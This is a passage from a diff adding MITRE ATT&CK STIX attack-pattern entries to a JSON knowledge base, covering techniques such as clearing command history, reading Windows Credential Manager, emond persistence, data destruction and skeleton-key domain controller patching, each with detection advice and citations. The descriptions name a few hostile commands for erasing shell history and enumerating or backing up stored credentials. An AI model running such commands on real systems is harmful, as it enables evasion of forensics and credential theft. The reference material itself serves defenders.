settings for a site collection. Retrieved April 4, 2018.", + "url": "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2" + }, + { + "source_name": "Sharepoint Sharing Events", + "description": "Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Clear Persistence", + "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)\n\nIn some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Gavin Knapp" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", + "created": "2022-07-29T19:32:11.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1070/009", + "external_id": "T1070.009" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + }, + { + "source_name": "Talos - Cisco Attack 2022", + "description": "Nick Biasini. (2022, August 10). Cisco Talos shares insights related to recent cyber attack on Cisco. Retrieved March 9, 2023.", + "url": "https://blog.talosintelligence.com/recent-cyber-attack/" + }, + { + "source_name": "NCC Group Team9 June 2020", + "description": "Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.", + "url": "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Clear Command History", + "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as unset HISTFILE, export HISTFILESIZE=0, history -c, rm ~/.bash_history.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the ~/.bash_history file are indicators of suspicious activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Log analysis", + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d3046a90-580c-4004-8208-66915bc29830", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1146", + "external_id": "T1146" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Windows Credential Manager", + "description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)\n\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\n\nCredential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\`. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)\n\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nAdversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.\n\nPassword recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Bernaldo Penas Antelo", + "Mugdha Peter Bansode", + "Uriel Kosayev", + "Vadim Khrykov" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process and command-line parameters of vaultcmd.exe for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”).(Citation: Malwarebytes The Windows Vault)\n\nConsider monitoring API calls such as CredEnumerateA that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nConsider monitoring file reads to Vault locations, %Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\, for suspicious activity.(Citation: Malwarebytes The Windows Vault)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", + "created": "2020-11-23T15:35:53.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1555/004", + "external_id": "T1555.004" + }, + { + "source_name": "Malwarebytes The Windows Vault", + "description": "Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020.", + "url": "https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/" + }, + { + "source_name": "Delpy Mimikatz Crendential Manager", + "description": "Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020.", + "url": "https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials" + }, + { + "source_name": "Microsoft Credential Locker", + "description": "Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020.", + "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN" + }, + { + "source_name": "Microsoft Credential Manager store", + "description": "Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020.", + "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store" + }, + { + "source_name": "Microsoft CredEnumerate", + "description": "Microsoft. (2018, December 5). CredEnumarateA function (wincred.h). Retrieved November 24, 2020.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea" + }, + { + "source_name": "passcape Windows Vault", + "description": "Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020.", + "url": "https://www.passcape.com/windows_password_recovery_vault_explorer" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Emond", + "description": "Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1160) service.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ivan Sinyakov" + ], + "x_mitre_detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d376668f-b208-42de-b1f5-fdfe0ad4b753", + "created": "2019-09-19T14:07:11.734Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1519", + "external_id": "T1519" + }, + { + "source_name": "xorrior emond Jan 2018", + "description": "Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019.", + "url": "https://www.xorrior.com/emond-persistence/" + }, + { + "source_name": "magnusviri emond Apr 2016", + "description": "Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019.", + "url": "http://www.magnusviri.com/Mac/what-is-emond.html" + }, + { + "source_name": "sentinelone macos persist Jun 2019", + "description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.", + "url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Spearphishing via Service", + "description": "Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1194", + "external_id": "T1194" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/163.html", + "external_id": "CAPEC-163" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Hardware Additions", + "description": "Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.\n\nWhile public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.6", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1200", + "external_id": "T1200" + }, + { + "source_name": "Ossmann Star Feb 2011", + "description": "Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018.", + "url": "https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html" + }, + { + "source_name": "Aleks Weapons Nov 2015", + "description": "Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018.", + "url": "https://www.youtube.com/watch?v=lDvf4ScWbcQ" + }, + { + "source_name": "McMillan Pwn March 2012", + "description": "Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018.", + "url": "https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/" + }, + { + "source_name": "Frisk DMA August 2016", + "description": "Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018.", + "url": "https://www.youtube.com/watch?v=fXthwl6ShOg" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Server Software Component", + "description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.\n\nProcess monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "created": "2019-06-28T17:52:07.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1505", + "external_id": "T1505" + }, + { + "source_name": "volexity_0day_sophos_FW", + "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", + "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/" + }, + { + "source_name": "US-CERT Alert TA15-314A Web Shells", + "description": "US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.", + "url": "https://www.us-cert.gov/ncas/alerts/TA15-314A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-03T17:30:32.192Z", + "name": "Data Destruction", + "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).\n\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Brent Murphy, Elastic", + "David French, Elastic", + "Syed Ummar Farooqh, McAfee", + "Prasad Somasamudram, McAfee", + "Sekhar Sarukkai, McAfee", + "Varonis Threat Labs", + "Joey Lei" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\\Windows\\System32\\.\n\nIn cloud environments, the occurrence of anomalous high-volume deletion events, such as the DeleteDBCluster and DeleteGlobalCluster events in AWS, or a high quantity of data deletion events, such as DeleteBucket, within a short period of time may indicate suspicious activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS", + "Containers" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "created": "2019-03-14T18:47:17.701Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1485", + "external_id": "T1485" + }, + { + "source_name": "DOJ - Cisco Insider", + "description": "DOJ. (2020, August 26). San Jose Man Pleads Guilty To Damaging Cisco’s Network. Retrieved December 15, 2020.", + "url": "https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network" + }, + { + "source_name": "Unit 42 Shamoon3 2018", + "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/" + }, + { + "source_name": "Palo Alto Shamoon Nov 2016", + "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/" + }, + { + "source_name": "FireEye Shamoon Nov 2016", + "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html" + }, + { + "source_name": "Kaspersky StoneDrill 2017", + "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf" + }, + { + "source_name": "Talos Olympic Destroyer 2018", + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + }, + { + "source_name": "Data Destruction - Threat Post", + "description": "Mimoso, M.. (2014, June 18). Hacker Puts Hosting Service Code Spaces Out of Business. Retrieved December 15, 2020.", + "url": "https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/" + }, + { + "source_name": "Symantec Shamoon 2012", + "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.", + "url": "https://www.symantec.com/connect/blogs/shamoon-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Non-Standard Encoding", + "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "created": "2020-03-14T23:39:50.117Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1132/002", + "external_id": "T1132.002" + }, + { + "source_name": "Wikipedia Binary-to-text Encoding", + "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding" + }, + { + "source_name": "Wikipedia Character Encoding", + "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Character_encoding" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Domain Controller Authentication", + "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + 